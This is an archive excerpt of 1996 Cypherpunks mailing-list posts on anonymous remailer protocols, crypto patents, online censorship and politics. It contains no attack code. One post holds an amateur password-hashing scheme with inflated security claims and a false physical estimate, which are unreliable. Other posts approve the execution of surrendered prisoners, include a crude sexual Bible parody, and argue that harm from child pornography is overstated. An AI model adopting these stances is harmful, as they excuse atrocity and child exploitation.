(well, except for the ones in it just for the sake of blowing things up). > And to those who misunderstood my posting: > a. I support the freedom of speech. > b. I'm not shure I can support freedom of speech > in ALL circumstances. Um, which one is it. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From js4smaug at eden.rutgers.edu Tue Sep 10 14:33:21 1996 From: js4smaug at eden.rutgers.edu (Smaug) Date: Wed, 11 Sep 1996 05:33:21 +0800 Subject: Allo allo Message-ID: Just figured i'd drop a hello in the box. Hopefully at least a few of you have encountered me at some point... For the rest, I am Si_Druid (si is for Silicon...) and i've been around too long :) I consider myself a cyBerpunk by a definition that myself and a group of other CbP's came up w/ that seemed to fit best. Whether it is best or not is a matter of much discrepancy by the hard core "CbP is a fictional genre" groupies, but its rather irrelevant to the rest of the populace. So why am i here? Well, our ideas on CbP include just about all forms of survival in this society, and cryptology is probably one of the leading forms. I figured I'd better throw my hat in the ring before it got out of hand and i wound up eating it instead. I'm not terribly experienced w/ crypts, pgp still annoys me, but 'back in the day' i used to write some low level crypts that were relatively impossible to break... they were also impossible to decrypt, which meant that the only way to use them was to work forward.... mostly i did password encryption schemes, this one working the best: string #a nice set of ascii codes currkeyletter #letter from string in use password #a password from 5 to whatever characters encrypted #the password encrypted char #the current character of the password we're playing w/ stringchar #the char # in the string for char=0 to lengthof(password) #getting our stringchar stringchar=char while stringchar >= lengthof(string) { stringchar=stringchar-lengthof(string) } currkeyletter=string[stringchar] #writing the encrypted password if char = 0 #first letter encrypted[char]=resolve(password[char],0,password[char+1],string[stringchar] else if char = lengthof(password) #last letter encrypted[char]=resolve(password[char],encrypted[char-1],0,string[stringchar]) else encrypted[char]=resolve(password[char],encrypted[char-1],password[char+1], string[stringchar]) end of for resolve(pw,en,pw2,st){ result=pw+en+pw2+st while result>=250 { result=result-250 } return(result) } ----- doesnt really matter what language you write it in, the difficulty is essentialy that the only way to solve it is to test all possible passwords and strings... which is... (lets say a complexity of pw=7, str=6) 52^7 * 250^6 ~=10^26 I think that was somewhere near the number of electrons in the universe :) Anyway, just providing y'all with something to toy with.... Si. Oh what a tangled web we weave, when we practice to deceive Case in point - www.*.* From jbugden at smtplink.alis.ca Tue Sep 10 14:55:50 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Wed, 11 Sep 1996 05:55:50 +0800 Subject: FW: Terrorists Message-ID: <9608108423.AA842379241@smtplink.alis.ca> tcmay at got.net (Timothy C. May) wrote: >Crypto anarchy means the undermining of governments, and hence handouts to people by government. People will only move physically for physical jobs, and not for handouts. People will flow to where the jobs are, and jobs will flow to where the people are. Isn't this what we really want? --Tim May Absolutely. I get tired of living in a small city of only 3 million. And when enough people have moved to urban areas cars will naturally become less useful because we won't have the room or the time to use them for intracity travel. Bicycle riding will then become the norm. And the weekend will be rotating with 1/7th of the population off on any given day so as to minimize the traffic loads and make better use of available resources. And power will concentrate in large organizations that will replace most of the functioning of the government. A crescendo of self organized criticality. I don't know if reference to Crazy Eddie or a growing sand pile makes a better oblique closing comment. James Got them Red China Blues... From dlv at bwalk.dm.com Tue Sep 10 15:11:54 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 06:11:54 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: Message-ID: snow writes: > On Mon, 9 Sep 1996, Timothy C. May wrote: > > > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > > in this morning. I'm sure you're busy, so I'll make this as short as > > possible. OK with you?" > > Suspicious Persons List, and there's just nothing we can do about it. We > > just can't have our corporate image linked to persons on the SPL. Now, Joe, > > you'll get a generous 6 weeks of severance pay, and Daphne will assist you > > with your outplacement processing. Of course, Joe, you will have to go > > through an inspection every morning until you're fully processed...there's > > that SPL matter, you know." > > JS: "Uh..." > > In this case I wouldn't bother with Mr. Bell's solution. This reminds me of a real story when an h.r. person walked in on some bank employee and told her than she was being laid off. "And by the way the no-fee bank account you had as an employee is closed, so here's an application you have to feel for a regular account with us." He got injured. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dthorn at gte.net Tue Sep 10 15:23:02 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 11 Sep 1996 06:23:02 +0800 Subject: Test...sorry about this - Reply In-Reply-To: Message-ID: <3234DD65.7B44@gte.net> Barbara Gamble wrote: > I got it too. And since I am a new subscriber, I thought it might be > the normal traffic. The Welcome msg *did* say the list is high- > traffic. Still, I was aghast--300 all at once, another 100 just in > the last hour. Is that typical? (Please forgive such a question from a > newcomer to the list.) > Z.B. 09/06 10:38 am > I'm just posting this to see if there's something wrong with my mail > filter - it dumped a ton of messages from this list over the night, > > and I'm trying to figure out why the !@%$# it did that. Sorry for the > interruption. > Zach Babayco > zachb at netcom.com <----- finger for PGP public key > http://www.geocities.com/SiliconValley/Park/4127 If this is any help, I've been on this forum (and on the WWW total) for 11 days now, and messages have averaged 4 per hour, 96 per day. But this only counts cypherpunks at toad.com. If you get email from several forums simultaneously, it might be a lot more. From tcmay at got.net Tue Sep 10 15:25:08 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 06:25:08 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 12:41 PM 9/10/96, Enzo Michelangeli wrote: >> As to what I presume is an insult to the folks on this list ("I'm >> personally not interested in conjuring up the latest utopia for a >> minoritarian sect of illuminati"), you know where the exit is. > >Triple cheers for free speech. Calling for expulsion of those who don't >share your opinion seems to me the clearest sign of will to remain an >enlightened minority. Then, why do you take it as an insult? I didn't call for your "expulsion." No one has been expelled in four years of the list's existence. However, when people complain about not being interested in the list topics, and refers to some of the main list topics as "conjuring up the latest utopia for a minoritarian sect of illuminati," then, yes, I would say this is insulting, or, at least, dismissive. As with a restaurant, if people complain loudly about the food, they ought to leave and not come back. This is not the restaurant expelling them, this is just them acting on their opinions. --Tim May, Member of the Minoritarian Illuminati We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From netsurf at pixi.com Tue Sep 10 15:25:41 1996 From: netsurf at pixi.com (NetSurfer) Date: Wed, 11 Sep 1996 06:25:41 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <1.5.4.32.19960909182501.00685618@pop3.interramp.com> Message-ID: On Mon, 9 Sep 1996, Will Rodger wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Why not? Because spammers _invariably_ forge the return addresses to keep > exactly that from happening. Indeed, Cyber Promo claims it "had an And then there are the network headers - you can usually see where the msg entered the net. These people aren't usually clever enough to spoof the headers beyond the from and reply to fields. #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From afabbro at umich.edu Tue Sep 10 15:36:51 1996 From: afabbro at umich.edu (Andrew Fabbro) Date: Wed, 11 Sep 1996 06:36:51 +0800 Subject: LEOs running anon servers? In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > There > are a number of anonymous remailers out in cyberspace, but it has been > stated by a knowledgeable source that a number of them are being operated > by law enforcement agencies (presumably to troll for criminal activity). A Can someone verify/discredit/comment on this statement? Who is the knowledgeable source? Andrew Fabbro [afabbro at umich.edu] http://www-personal.umich.edu/~afabbro/ PGP mail preferred; finger afabbro at us.itd.umich.edu for key "A good marketing organization listens to its customers...WE HEAR YOU!" - the National Security Agency -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.0 iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74 /291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68 CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4 ClypqKualSA= =L3rM -----END PGP SIGNATURE----- From enzo at ima.com Tue Sep 10 15:45:17 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Wed, 11 Sep 1996 06:45:17 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Timothy C. May wrote: > At 10:04 AM 9/9/96, Enzo Michelangeli wrote: > > >I and you may well choose to do so, but the vast majority of the human > >beings believe just anything that is repeated loud and long enough. > >Otherwise, nobody would hire PR and pay for advertisement, politicians > >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead > >of gunshots, etc. I'm personally not interested in conjuring up the latest > >utopia for a minoritarian sect of illuminati: I need to live in the real > >world, and push for viable solutions that change it for better, now. > > Yes, Bosnians and Serbs would not be killing each other if only they could > receive government-approved information! In fact, their governments were the chief repeaters of things loud and long enough, and were believed. > (Hint: This shows that neither governments nor churches nor the United > Nations knows any better solutions to the "who do you trust" problem. And, > I believe, mostly governments and other such entities exist to serve their > own interests.) Can you please quote a sentence of mine where I have denied that? > As to what I presume is an insult to the folks on this list ("I'm > personally not interested in conjuring up the latest utopia for a > minoritarian sect of illuminati"), you know where the exit is. Triple cheers for free speech. Calling for expulsion of those who don't share your opinion seems to me the clearest sign of will to remain an enlightened minority. Then, why do you take it as an insult? Enzo From tbyfield at panix.com Tue Sep 10 15:50:13 1996 From: tbyfield at panix.com (t byfield) Date: Wed, 11 Sep 1996 06:50:13 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: <199609091638.MAA19400@mail2.panix.com> Message-ID: At 6:05 PM -0500 on 9/9/96, Vince Cate wrote: > > vince at offshore.com.ai (Vincent Cate): > > > If the Navy was firing missiles in this area, it really does seem >like the > > > press should be checking out this angle. > > > > What makes you think they aren't? > > Not saying they aren't; however, I don't recall seeing CNN or any of the > networks saying if the Navy really was firing missiles or not. Have they? > Never seen anyone ask questions about US firing missiles (have seen them > ask if it was a missile or a bomb). I don't get any US newspapers here in > Anguilla, so my impression of the US press is really just from TV. > > Is the press on top of this? Some good friends (Satanic Mainstream Reporters) who are working on the case have certainly _said_ they were looking into it; of course, maybe [your favorite conspiracy here] bought them out/blackmailed them/planted a microchip in their bum/Stepfordized them/[your favorite subversion method here]. Given (a) the intense competition among reporters and (b) the near-impossibility of keeping secret something known by 1/2/3+ people, I somehow kind of doubt the plane was shot down by a US ship--as one friend put it, they'd have to sink the entire ship to keep it a secret, but it'd be hard to keep it a secret why they sunk the ship, etc., etc. And, frankly, I doubt the FBI/NTSB/et al. really know what happened. Though I doubt they'd keep on mentioning the missile theory without _very_ good reason to believe it's likely. /t From dlv at bwalk.dm.com Tue Sep 10 15:56:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 06:56:36 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: <2.2.32.19960910110046.00de3c78@panix.com> Message-ID: Duncan Frissell writes: > At 04:41 AM 9/9/96 -0700, Timothy C. May wrote: > > >Prison sentences in Germany for those who reveal forbidden information > >about "the Holocaust," > > In a country where you get 10 months for stabbing a famous tennis star in > the back, prison isn't much of a penalty. I'm sure the sentense would have been different if she weren't a Slavic untermensch, or if he were, say, a Turk. A friend of mine related how his father - a Jew and a Soviet Army officer - commanded a company in WW2. In 1944 they came across a church where over a thousand Nazi soldiers surrendered without reistance. He announced them "Ich bin ain Jude" and had them all executed. I think he did the right thing. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Tue Sep 10 16:05:29 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 07:05:29 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <199609101626.JAA19796@mail.pacifier.com> At 08:13 AM 9/10/96 -0500, Mike McNally wrote: >Declan McCullagh wrote: >> >> The revised Hatch "child porn" legislation criminalizes even >> *attempting* to download the forbidden data. > >What would it look like, exactly, when they went in to arrest the >AltaVista search engine? "Drop those bits! We've got you delimited!" Jim Bell jimbell at pacifier.com From jya at pipeline.com Tue Sep 10 16:11:03 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 07:11:03 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <199609101626.QAA19815@pipe1.t2.usa.pipeline.com> FiTi, 10 September 1996. Call to abolish banking secrecy By William Lewis in Cambridge The UK government should take a lead and abolish banking secrecy in its dependent territory offshore centres, a former legal adviser to MI5 and MI6, the British intelligence agencies, said yesterday. Mr David Bickford, the first British intelligence lawyer to speak publicly in the UK, said at a conference in Cambridge, 50 miles north-east of London, that there "appears to be no justification at all for offshore bank secrecy other than to protect the criminal". He said "offshore bank secrecy can and must be abolished" and "the UK should be the first to abolish this secrecy given their control of their dependent territory offshore centres". Mr Bickford, who now runs an international legal consultancy, said "endemic corruption" is caused by offshore secrecy, and it is "difficult to see why it is tolerated by any other than those with an unlawful disposition". He said allowing countries to maintain offshore banking secrecy is "a classic example of the corruptive influence of organised crime". Mr Bickford added that the "justification is put forward at all is an example of the overwhelming subversive corruptive influence of organised crime which has managed to magic a seemingly acceptable position out of the sheer weight of its financial proceeds from narcotics, fraud, extortion and other criminal enterprise". Mr Raymond Kendall, secretary general of Interpol told the 14th International Symposium on Economic Crime that governments should commit more resources and step up co-operation to tackle the growing problem of international corruption. [End] From mech at eff.org Tue Sep 10 16:12:04 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 11 Sep 1996 07:12:04 +0800 Subject: EFF & Penet Message-ID: <199609101924.MAA29487@eff.org> FYI: EFF is in contact with Julf, and helping him on an informal basis to examine his legal and media options for setting the record straight in re: the Observer attack on his and anon.penet.fi's character. (Most details are attorney-client priviledged, thus the brevity of this note.) -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From andrew_loewenstern at il.us.swissbank.com Tue Sep 10 16:14:13 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 11 Sep 1996 07:14:13 +0800 Subject: strengthening remailer protocols In-Reply-To: Message-ID: <9609101751.AA00594@ch1d157nwk> Wei Dai writes: > How about a combination of the two? Suppose Alice wants to > anonymously post a message and get replies. She generates a > new RSA key, signs her post with it, and asks readers to send > encrypted replies to a server. Then periodicly she sends a > one-time reply block to the server to retrieve the accumulated > replies. I'd like to chime in and say that this is a really good idea. Basically a nymserver that holds onto incoming mail until an e-mail arrives from the nym to retrieve it. How would mixmaster be able to support one-time reply blocks? If the nym's mailbox is larger than the mixmaster message size (pretty likely) and needs to be split up, then more than one reply-block is going to be required. Should the nym generate a big stack of reply-blocks/routing headers and send them in with the retrieval request? I suppose the server could fillup as many mixmaster message parts as it had blocks, then append something like "15 more messages waiting (32,082 bytes - Two More Reply Blocks Required)" and ship it off. Reliability is a problem with remailers... what happens now if a remailer in your reply block goes out and you receive mail at your nym account? Does it just disappear? With this system you could have a simple ACK protocol to ensure reliable delivery of the mail. A magic cookie would be appended to your retrieved mail, which the server would then hold onto (it would still count against your quota...). The mail would be deleted once you sent back an ACK with the magic cookie. Here is yet another good application for DigiCash. The operator could offer free accounts with very small mailbox quotas, or charge for bigger accounts. Message retrieval could also be charged, of course. Another idea is that the sender could affix postage if they wanted their message to be appended to a full mailbox... A service like this is no different from something like pobox.com, except that this service lets you pickup your mail through e-mail instead of POP. So I don't think the operator would/should incurr any more liability for what runs through the system than pobox. andrew p.s. It would also be a cool thing, IMHO, for nym servers to bounce back an advertisement to everyone who sends mail to a nym.... A way to spread the word. From tcmay at got.net Tue Sep 10 16:21:38 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 07:21:38 +0800 Subject: Putting Pressure on Web Search Engines Message-ID: At 1:13 PM 9/10/96, Mike McNally wrote: >Declan McCullagh wrote: >> >> The revised Hatch "child porn" legislation criminalizes even >> *attempting* to download the forbidden data. > >What would it look like, exactly, when they went in to arrest the >AltaVista search engine? They won't likely go after a specific search site on child porn charges, per se, but they may try to impose restrictions on what gets indexed (ironically, given the name "The Index"). Just as spiders will avoid indexing some pages marked for "no index" (I don't recall the exact syntax), so too could they avoid indexing--and hence making available--sites which the government has declared off limits, either in the U.S. or in foreign sites. To the extent search engines are becoming the de facto entry point to the Web for many of us (maybe even most of us), controlling what they are allowed to index and then report on to customers is a powerful means of controlling speech. I have two predictions: 1. Alta Vista, Excite, etc., will offer services based on parental ratings, religious ratings, etc. Like well-known site filtering services such as SurfWatch and LolitaWatch, these services will present various indices to various customers. To make this clearer, imagine "Alta Vista for Kids," with only kid-friendly (TM) sites and pages indexed. 2. Various governments will try to pressure the various search engine operations to limit indexing of various sites and pages. While of course it is difficult for, say, Singapore to tell Alta Vista what to index, the Singaporans can say they'll put Alta Vista on the list of sites which cannot be accessed easily by Singaporans. Thus will pressure be applied. --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From mix at squirrel.owl.de Tue Sep 10 16:21:51 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Wed, 11 Sep 1996 07:21:51 +0800 Subject: Looking for Love Message-ID: <19960910173401.22472.qmail@squirrel.owl.de> Hi, I'm Sham69, the best, most feared computer and telecom hacker in America. And I'm looking to loose my cherry! Me: 17, 5'8", brown eyes, scraggly hair, inch-thick glasses, pocket protector. Interests: late night romantic candle-lit pizza and coke dinners, dumpster diving by the AT&T corporate offices, making free phone calls all over the globe, collecting Kevin Mitnik memorabilia, keeping up with the adventures of those hot babes at The Spot, sleeping on the floor of a cheap Vegas motel with thirty other geeks at DefCon. You: Sexually adverturous, unconcerned with personal hygiene, experienced at microwaving cold pizza, limited social skills, interested in the Web, knowledge of DOS batch files a plus. Please send responses to Box 4456, enquirer at alpha.c2.org From frantz at netcom.com Tue Sep 10 16:22:08 1996 From: frantz at netcom.com (Bill Frantz) Date: Wed, 11 Sep 1996 07:22:08 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: <199609101730.KAA22130@netcom6.netcom.com> At 10:06 PM 9/9/96 -0700, Lance Cottrell wrote: >At 4:19 PM -0700 9/9/96, Bill Frantz wrote: >>To paraphrase John Von Neumann, any system which uses reply blocks is in a >>state of sin. By this I mean that if there is a chain pointing at you, a >>sufficiently powerful attacker can walk down that chain and find you. >> >>Given that, I will join the state of sin by proposing a mechanism which >>will allow Alice to receive a reply from Bob, but change her mind at any >>time. The basic idea is to have a one-time reply block which either Bob or >>Alice can send to. If Alice thinks that too much time has elapsed, and >>powerful enemies are walking down her reply block chain, she can send >>herself a reply and break the chain. (She might send a reply thru each >>link in the chain to break all the links.) > >The reason the message is not resendable is that the remailers keeps track >of the serial number of that header. If forced, the log of serial numbers >could be deleted, and the operator would process the message. > >Unless you are assuming some key archived by each remailer for the reply >block, then I think it will be possible to repair the chain. I was thinking of storing a reply-key in each remailer. The protocol might go something like this (straw man proposal): (1) Alice picks n random ids (say 160 bits or so) and n random keys. (2) Alice sends the combination to remailer[i], i=0,n-1. (3) Alice builds a reply block which consists of the remailer return path, each element encyphered with the appropriate key and sends it to Bob. (4) When a remailer processes a reply block element, it removes it from the reply block, looks up the id in its database, decrypts the address of the next hop, removes the database element and forwards the message. If Alice becomes nervous, she sends n "replys" thru each remailer to cause the return path to be destroyed. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From caronni at tik.ee.ethz.ch Tue Sep 10 16:28:15 1996 From: caronni at tik.ee.ethz.ch (Germano Caronni) Date: Wed, 11 Sep 1996 07:28:15 +0800 Subject: forward secrecy in mixmaster In-Reply-To: <199609100232.TAA22069@infinity.c2.org> Message-ID: <199609101929.VAA19477@kom30.ethz.ch> Matthew Ghio wrote: > > I agree it does not make much difference mathematically, but one DH modulus > > always makes me uneasy. DH is still patented though. I think I will continue > > to use RSAREF, but compose the standard so the protocol supports unlimited > > key sizes. Just a short note. The DH patent (#4200770), as held by Cylink expires at the 29th of april '97. Afterwards DH enters the public domain. That's a certain argument for using DH key exchange. RSA will go into the public domain somewhen in 2002, if I remember correctly. Germano From varange at crl.com Tue Sep 10 16:30:02 1996 From: varange at crl.com (Troy Varange) Date: Wed, 11 Sep 1996 07:30:02 +0800 Subject: Can you trust your ISP? Message-ID: <199609101903.AA03845@crl5.crl.com> No. From jya at pipeline.com Tue Sep 10 16:31:16 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 07:31:16 +0800 Subject: PIN_hed Message-ID: <199609101731.RAA14869@pipe1.t1.usa.pipeline.com> 9-9-96. BuWi: "Pinkerton and SAIC establish alliance to offer security solutions against high-tech gangs, cybercriminals" "Pinkerton's gumshoes with SAIC's spooks represent a unique resource for clients who must hide from the USG high-value, mission-critical assets," said Denis Brown, PKT prez. Bob Beyster, SAIC czar, said, "Our ex-TLAs are available around the clock to jigger-jive clients freaked by TLA-stories of computer hackers, criminals and insiders." PKT bill-pads more than 45,000 and SAIC 22,000; both underpay perps and taxes. "NCSA: policeman on the internet beat." NCSA employs a number of ex-law enforcement officers who try to infiltrate hacker networks and solve problems before they start. "We track hackers by going underground to their sites," Tippett said. "We pretend to be their friends, but they fuck with our heads." "Hi/fn Integrates Encryption With Data Compression For Efficient, Secure Networking." MUM 1.0 provides a processor independent software implementation of industry standard DES and Triple DES data encryption, HMAC-SHA, HMAC-MD5 keyed hash functions, and LZS(r) and MPPC (Microsoft Point to Point Compression) compression for Internet, intranet and client-server networks. ----- http://jya.com/pinhed.txt (14 kb for 3) PIN_hed From gbroiles at netbox.com Tue Sep 10 16:31:17 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 11 Sep 1996 07:31:17 +0800 Subject: TWA 800 - Serious thread. Message-ID: <2.2.32.19960910190024.007245e4@pop.ricochet.net> At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: >If govt. protects its "sources and methods", however nefarious, to the >extent that the public is never asked to assent to these methods (even >though a few of us know about them anyway), then the public doesn't have >to become overtly cynical about what's going on. But the public *is* asked to assent to those methods - your chance to vote on them is known colloquially as "jury duty". -- Greg Broiles |"Post-rotational nystagmus was the subject of gbroiles at netbox.com |an in-court demonstration by the People http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt |Studdard." People v. Quinn 580 NYS2d 818,825. From willday at rom.oit.gatech.edu Tue Sep 10 16:38:25 1996 From: willday at rom.oit.gatech.edu (Will Day) Date: Wed, 11 Sep 1996 07:38:25 +0800 Subject: Harry Browne a cryptographer Message-ID: <199609102028.QAA13808@rom.oit.gatech.edu> -----BEGIN PGP SIGNED MESSAGE----- Here's an interesting detail from an AP story: A short time ago, at a computer terminal far, far away, Steve L. Dasbach wrote: >From: 76060.3222 at CompuServe.COM ("Steve L. Dasbach") >Date: 10 Sep 96 14:32:09 EDT >Message-Id: <57196.3235C30E at dehnbase.fidonet.org> >To: LPUS-PRES at dehnbase.fidonet.org (LP business - presidential) >Subject: APn Article on Harry Browne > > By KARIN MILLER > Associated Press Writer > FRANKLIN, Tenn. (AP) -- > Browne said he formed his attitude toward government when he entered the >U.S. Army three years after high school and became a cryptographer. The article didn't say anything more about his cryto past.. === Will Day * * * * * * * * * * * willday at rom.oit.gatech.edu HARRY BROWNE FOR PRESIDENT http://rom.oit.gatech.edu/~willday/ http://www.HarryBrowne96.org/ OIT, Georgia Tech, Atlanta 30332-0715 * * * * * * * * * * * =-> Opinions expressed are mine alone and do not reflect OIT policy <-= -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQCVAwUBMjXPcBDHlOdPw2ZdAQHVZwP7Bd5FJ1Usgq7TIzOGofhuC1ihc687zLg/ pPxzR5/8DpHj6x7agdLnKyivBROX9aTE616pzgjOfqup+/VWHdxRbChJ/S0twrn0 QPWOq4hkvrm9ygJlUSzmGMBEv4BeT/IIITlwrGUo7jaMtvemKPHiNnfE3u+Ii6xr b44iifT6ygg= =E9oM -----END PGP SIGNATURE----- From Ryan.Russell at sybase.com Tue Sep 10 16:48:50 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Wed, 11 Sep 1996 07:48:50 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. Message-ID: <9609102022.AA04467@notesgw2.sybase.com> Now there's a business I'd like to get into.... reselling pseudo-random bit strings.... Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: roy @ sendai.scytale.com (Roy M. Silvernail) @ smtp Date: 09/10/96 07:14:33 AM Subject: Re: ALPHACIPHER - An unbreakable encryption program. -----BEGIN PGP SIGNED MESSAGE----- In alt.security, survival at aa.net writes: [ attribution scrambled ] >> True, but somehow I have a feeling that Alphacipher is not a one-time >> pad, and thus is breakable. > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > We've solved all of the problems associated with pad creation, > distribution, packaging and many other concerns that have previously > limited the use of a cipher in this class. Their web page alludes to a OTP-like operation where you have to purchase key "refills". It doesn't say where they store the escrowed copies of the key material. > Visit our net page at http://www.aa.net/cyber-survival-hq for more > information, and read the reply in response to the unfounded attack by > Curtin, posted above. I recommend this page, if only for the great conspiracy theory about automated telephone line scanning. - -- Roy M. Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ 0MlhN5IxIBk= =y4kc -----END PGP SIGNATURE----- From frantz at netcom.com Tue Sep 10 16:53:45 1996 From: frantz at netcom.com (Bill Frantz) Date: Wed, 11 Sep 1996 07:53:45 +0800 Subject: forward secrecy in mixmaster Message-ID: <199609102058.NAA12310@netcom7.netcom.com> At 9:29 PM 9/10/96 +0200, Germano Caronni wrote: >Just a short note. The DH patent (#4200770), as held by Cylink expires at >the 29th of april '97. Afterwards DH enters the public domain. That's a >certain argument for using DH key exchange. RSA will go into the public >domain somewhen in 2002, if I remember correctly. The US patent for RSA expires September 20, 2000 according to Applied Cryptography Second Edition, p474. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From tcmay at got.net Tue Sep 10 16:57:27 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 07:57:27 +0800 Subject: Child Porn as Thoughtcrime Message-ID: Q: Is a drawing of a child engaging in a sexual act an illegal item? Q: Is an image of Raquel Welch morphed to make her look like a 15-year-old illegal? Q: Is writing a story about a child having sex illegal? Q: Is a collage of images of little girls (or boys, one presumes) in swimsuits, with apparent salacious intent, illegal? Q: Is accessing a Web site having nude or sexually-related images of children who are of legal sexual age in the site's country--but not in the accessor's country--illegal? Q: Is it legal to have photographs of one's own children in a nude state? (E.g., playing in a backyard pool, at the beach, etc.) Does it become illegal to let others see these photographs? How about putting them on a Web site? Q: Is a crime committed if a teenaged girls takes a photograph of _herself_ and shows it to others? To adults? Or if she writes a salacious story about herself or her friends? Or if she just invents it all? Whom is exploiting whom? Which acts are crimes? I submit that the various child porn laws we have in the United States are about the clearest examples of "thoughtcrime" one can find, where the _thought_ is what is being criminalized. First, a caveat, which ought to be clear, but which is necessary to state anyway (never know what search engines will find my words and take them out of context). I have no unusual interest in little children. Surely some teen girls can be sexually attractive, even if technically underage. Nothing surprising in this, surely? But, no, I am not an advocate of "child porn," merely wondering about the many constitutional and moral issues involved in the panoply of laws and precedents involved. Anyway, we have on this list various comments about "child porn" and why it should be illegal: -- consumption of child porn "creates a market" -- it harms the children -- it's disgusting -- etc. Clearly the first argument applies to many other things. Why not outlaw pro-drug speech? Pro-drug speech "creates a market" for an illegal product. Shut down "High Times," seize copies of books by Aldous Huxley and William Burroughs, ban mocking comments about the War on Some Drugs. The second argument, that children are actually harmed, is vitiated by the fact that much so-called child porn comes from countries where the actors are of legal age. How can a 14-year-old Thai girl be "harmed" when what she is being paid to do is perfectly legal in Thailand? (It's parallel to the situation with, say, Arab countries. Porn videos in Saudi Arabia are of course illegal, with roughly the status of child 